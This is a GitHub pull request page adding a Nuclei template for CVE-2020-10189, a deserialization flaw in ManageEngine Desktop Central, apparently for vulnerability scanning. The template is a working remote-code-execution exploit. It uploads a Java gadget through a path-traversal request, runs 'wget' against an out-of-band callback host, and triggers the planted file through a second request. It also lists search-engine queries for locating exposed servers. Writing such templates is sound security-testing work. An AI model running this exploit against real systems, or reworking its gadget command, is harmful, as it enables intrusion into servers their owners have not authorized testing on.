Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2020-10189 #9591

Open
wants to merge 7 commits into
base: main
Choose a base branch
from
Open

CVE-2020-10189 #9591

Changes from all commits
Commits
Show all changes
7 commits
Select commit Hold shift + click to select a range
8a5bde3
Create CVE-2020-10189 template
king-alexander Apr 16, 2024
a58c003
Fix trailing whitespace
king-alexander Apr 16, 2024
4be5978
Add Stage 1
king-alexander Apr 30, 2024
825b9fb
Add Stage 2
king-alexander Apr 30, 2024
7f80f00
Update description
king-alexander Apr 30, 2024
d3087ea
Update references
king-alexander Apr 30, 2024
0d6238b
fix template
DhiyaneshGeek Jun 24, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
69 changes: 69 additions & 0 deletions http/cves/2020/CVE-2020-10189.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,69 @@
id: CVE-2020-10189

info:
name: ManageEngine Desktop Central Java Deserialization
author: king-alexander
severity: critical
description: |
Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution.
remediation: |
Apply updates per vendor instructions.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-10189
- https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189
- https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html
- https://y4er.com/posts/cve-2020-10189-zoho-manageengine-rce/
- https://cwe.mitre.org/data/definitions/502.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-10189
cwe-id: CWE-502
epss-score: 0.97206
epss-percentile: 0.99826
cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: zohocorp
product: manageengine_desktop_central
fofa-query:
- body="manageengine desktop central 10"
- title="manageengine desktop central 10"
- app="zoho-manageengine-desktop"
shodan-query: http.title:"manageengine desktop central 10"
google-query: intitle:"manageengine desktop central 10"
tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive

flow: http(1) && http(2)

http:
- raw:
- |
POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream

{{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}}

matchers:
- type: status
status:
- 200
internal: true

- raw:
- |
POST /cewolf/?img=%5Clogger.zip HTTP/1.1
Host: {{Hostname}}

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"

- type: status
status:
- 200
Loading